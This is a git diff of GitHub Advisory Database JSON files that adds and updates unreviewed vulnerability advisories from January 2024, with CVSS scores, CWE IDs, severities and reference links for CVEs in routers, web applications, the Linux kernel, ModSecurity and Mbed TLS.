a/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json +++ b/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json @@ -36,6 +36,14 @@ { "type": "WEB", "url": "https://github.com/Matroska-Org/libebml/compare/release-1.4.4...release-1.4.5" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BJUXVOIRWPP7OFYUKQZDNJTSLWCPIZBH/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XNANFT4P6KL4WDQ3TV6QQ44NSC7WKLAB/" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json b/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json index a943efe6e4925..9d6196b1de313 100644 --- a/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json +++ b/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vqj2-hm8r-26qm", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2023-51043" ], "details": "In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T11:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json b/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json index f8efe772ecffc..e3e61e8bb52c5 100644 --- a/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json +++ b/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vqxw-rw4p-r6vh", - "modified": "2024-01-25T15:31:53Z", + "modified": "2024-02-01T15:30:24Z", "published": "2024-01-25T15:31:53Z", "aliases": [ "CVE-2024-22729" ], "details": "NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T15:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json b/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json index d32e3b142374d..f517b142d4b32 100644 --- a/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json +++ b/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vr6g-w83m-c9vg", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52090" ], "details": "A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vr97-92rp-h57c/GHSA-vr97-92rp-h57c.json b/advisories/unreviewed/2024/01/GHSA-vr97-92rp-h57c/GHSA-vr97-92rp-h57c.json new file mode 100644 index 0000000000000..e41b9c31c3d67 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-vr97-92rp-h57c/GHSA-vr97-92rp-h57c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vr97-92rp-h57c", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-31T00:30:17Z", + "aliases": [ + "CVE-2023-51202" + ], + "details": "OS command injection vulnerability in command processing or system call componentsROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary commands.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51202" + }, + { + "type": "WEB", + "url": "https://github.com/16yashpatel/CVE-2023-51202" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-vrjf-gppf-qvj4/GHSA-vrjf-gppf-qvj4.json b/advisories/unreviewed/2024/01/GHSA-vrjf-gppf-qvj4/GHSA-vrjf-gppf-qvj4.json new file mode 100644 index 0000000000000..cb2cbdfb4b472 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-vrjf-gppf-qvj4/GHSA-vrjf-gppf-qvj4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrjf-gppf-qvj4", + "modified": "2024-01-30T12:30:18Z", + "published": "2024-01-30T12:30:18Z", + "aliases": [ + "CVE-2024-1063" + ], + "details": "Appwrite <= v1.4.13 is affected by a Server-Side Request Forgery (SSRF) via the '/v1/avatars/favicon' endpoint due to an incomplete fix of CVE-2023-27159.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1063" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/research/tra-2024-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json b/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json index de5d3e9ef3e3b..2537a07cd5d5b 100644 --- a/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json +++ b/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vrx4-754w-fhfx", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-22660" ], "details": "TOTOLINK_A3700R_V9.1.2u.6165_20211012has a stack overflow vulnerability via setLanguageCfg", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T15:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json b/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json index 829766568c9d9..e20e16288fa84 100644 --- a/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json +++ b/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vvwc-xg9v-c7jf", - "modified": "2024-01-23T12:30:29Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:29Z", "aliases": [ "CVE-2024-23181" ], "details": "Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user's web browser.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json b/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json index 5568e9e8376cf..47b1cf6df7a7f 100644 --- a/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json +++ b/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vw65-ccrc-xmfw", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0746" ], "details": "A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json b/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json index d3034eae56fa2..d929796765c79 100644 --- a/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json +++ b/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vwg3-8x87-rfjm", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22638" ], "details": "liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulenrabiity via the component /livesite/edit_designer_region.php.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vwmq-g758-4rpf/GHSA-vwmq-g758-4rpf.json b/advisories/unreviewed/2024/01/GHSA-vwmq-g758-4rpf/GHSA-vwmq-g758-4rpf.json new file mode 100644 index 0000000000000..5158646df2ab2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-vwmq-g758-4rpf/GHSA-vwmq-g758-4rpf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwmq-g758-4rpf", + "modified": "2024-01-30T12:30:18Z", + "published": "2024-01-30T12:30:18Z", + "aliases": [ + "CVE-2024-1030" + ], + "details": "A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1030" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252303" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252303" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json b/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json index 06dc568e50875..f59b34b8975fa 100644 --- a/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json +++ b/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vwwf-cxx3-3hpv", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2021-42145" ], "details": "An assertion failure discovered in in check_certificate_request() in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers to cause a denial of service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-755" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json b/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json index b423434c65694..ab4d8d9a9b01d 100644 --- a/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json +++ b/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-w2fw-qqqw-v63m/GHSA-w2fw-qqqw-v63m.json b/advisories/unreviewed/2024/01/GHSA-w2fw-qqqw-v63m/GHSA-w2fw-qqqw-v63m.json new file mode 100644 index 0000000000000..e9be4ea4ffca8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w2fw-qqqw-v63m/GHSA-w2fw-qqqw-v63m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2fw-qqqw-v63m", + "modified": "2024-01-31T09:30:18Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2024-23170" + ], + "details": "An issue was discovered in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2. There was a timing side channel in RSA private operations. This side channel could be sufficient for a local attacker to recover the plaintext. It requires the attacker to send a large number of messages for decryption, as described in \"Everlasting ROBOT: the Marvin Attack\" by Hubert Kario.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23170" + }, + { + "type": "WEB", + "url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-1/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T08:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json b/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json index da0c43462f5e6..685575eb6eb97 100644 --- a/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json +++ b/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w2m4-7x76-qjmh", - "modified": "2024-01-28T03:30:35Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-28T03:30:35Z", "aliases": [ "CVE-2024-23739" ], "details": "An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-28T03:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json b/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json index c66cee5c06655..a67426e2c6327 100644 --- a/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json +++ b/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20985" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json b/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json index 7884938ed9c6f..790a4706a9c32 100644 --- a/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json +++ b/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20973" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-w56r-g989-xqw3/GHSA-w56r-g989-xqw3.json b/advisories/unreviewed/2024/01/GHSA-w56r-g989-xqw3/GHSA-w56r-g989-xqw3.json new file mode 100644 index 0000000000000..9cab0f33f97f2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w56r-g989-xqw3/GHSA-w56r-g989-xqw3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w56r-g989-xqw3", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2024-1019" + ], + "details": "ModSecurity / libModSecurity 3.0.0 to 3.0.11 is affected by a WAF bypass for path-based payloads submitted via specially crafted request URLs. ModSecurity v3 decodes percent-encoded characters present in request URLs before it separates the URL path component from the optional query string component. This results in an impedance mismatch versus RFC compliant back-end applications. The vulnerability hides an attack payload in the path component of the URL from WAF rules inspecting it. A back-end may be vulnerable if it uses the path component of request URLs to construct queries. Integrators and users are advised to upgrade to 3.0.12. The ModSecurity v2 release line is not affected by this vulnerability.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1019" + }, + { + "type": "WEB", + "url": "https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w5f2-rh5m-26w2/GHSA-w5f2-rh5m-26w2.json b/advisories/unreviewed/2024/01/GHSA-w5f2-rh5m-26w2/GHSA-w5f2-rh5m-26w2.json new file mode 100644 index 0000000000000..60701dd769744 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w5f2-rh5m-26w2/GHSA-w5f2-rh5m-26w2.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5f2-rh5m-26w2", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51843" + ], + "details": "react-dashboard 1.4.0 is vulnerable to Cross Site Scripting (XSS) as httpOnly is not set.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51843" + }, + { + "type": "WEB", + "url": "https://github.com/flatlogic/react-dashboard/issues/65" + }, + { + "type": "WEB", + "url": "https://github.com/flatlogic/react-dashboard" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51843.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json b/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json new file mode 100644 index 0000000000000..f0bc1c1fc47c3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5f8-jmcg-4qrj", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-24325" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setParentalRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24325" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/11/TOTOlink%20A3300R%20setParentalRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json b/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json index d10d3f535e3ac..34ec5910dec53 100644 --- a/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json +++ b/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json @@ -44,6 +44,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-w6c8-6gw8-5gvp/GHSA-w6c8-6gw8-5gvp.json b/advisories/unreviewed/2024/01/GHSA-w6c8-6gw8-5gvp/GHSA-w6c8-6gw8-5gvp.json new file mode 100644 index 0000000000000..a441be676c43d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w6c8-6gw8-5gvp/GHSA-w6c8-6gw8-5gvp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6c8-6gw8-5gvp", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6946" + ], + "details": "The Autotitle for WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6946" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-6946" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/54a00416-c7e3-44f3-8dd2-ed9e748055e6/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json b/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json index 9cc2a9106c322..97ee5d18db3f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json +++ b/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-w7vr-jmcf-cx4m/GHSA-w7vr-jmcf-cx4m.json b/advisories/unreviewed/2024/01/GHSA-w7vr-jmcf-cx4m/GHSA-w7vr-jmcf-cx4m.json new file mode 100644 index 0000000000000..46460411f735d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w7vr-jmcf-cx4m/GHSA-w7vr-jmcf-cx4m.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7vr-jmcf-cx4m", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-6942" + ], + "details": "Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to bypass authentication by sending specially crafted packets and connect to the products illegally.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": 